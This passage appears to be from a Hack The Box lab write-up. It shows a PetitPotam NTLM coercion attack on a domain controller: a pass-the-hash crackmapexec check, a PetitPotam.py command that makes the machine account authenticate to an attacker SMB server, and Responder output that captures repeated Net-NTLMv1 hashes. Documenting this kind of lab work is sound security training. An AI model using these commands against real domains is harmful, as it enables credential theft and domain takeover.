NTLM Relay via PetitPotam
Another solution to invoke a SYSTEM level Net-NTLMv1 authentication to an attacker controlled SMB server
This can be done as any regular domain user without elevating privileges to the henry.vinson_adm
user
testing
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ crackmapexec smb apt.htb.local -d HTB.LOCAL -u henry.vinson -H 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -M petitpotam
SMB apt.htb.local 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB apt.htb.local 445 APT [+] HTB.LOCAL\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
PETITPOT... apt.htb.local 445 APT VULNERABLE
PETITPOT... apt.htb.local 445 APT Next step: https://github.com/topotam/PetitPotam
PetitPotam
┌──(kali㉿kali)-[~/…/htb/labs/apt/PetitPotam]
└─$ KRB5CCNAME=../smb/hashdump/henry.vinson@apt.htb.local.ccache python3 PetitPotam.py 10.10.16.8 apt.htb.local -d HTB.LOCAL -no-pass -k -dc-ip $IPv6 -target-ip $IPv6 -pipe all
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
Trying pipe efsr
[-] connecting to ncacn_np:apt.htb.local[\PIPE\efsrpc]
[+] Connected!
[+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe lsarpc
[-] connecting to ncacn_np:apt.htb.local[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe samr
[-] connecting to ncacn_np:apt.htb.local[\PIPE\samr]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe netlogon
[-] connecting to ncacn_np:apt.htb.local[\PIPE\netlogon]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe lsass
[-] connecting to ncacn_np:apt.htb.local[\PIPE\lsass]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Done through 5 different MSRPC pipes
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
on Responder
Moving on to cracking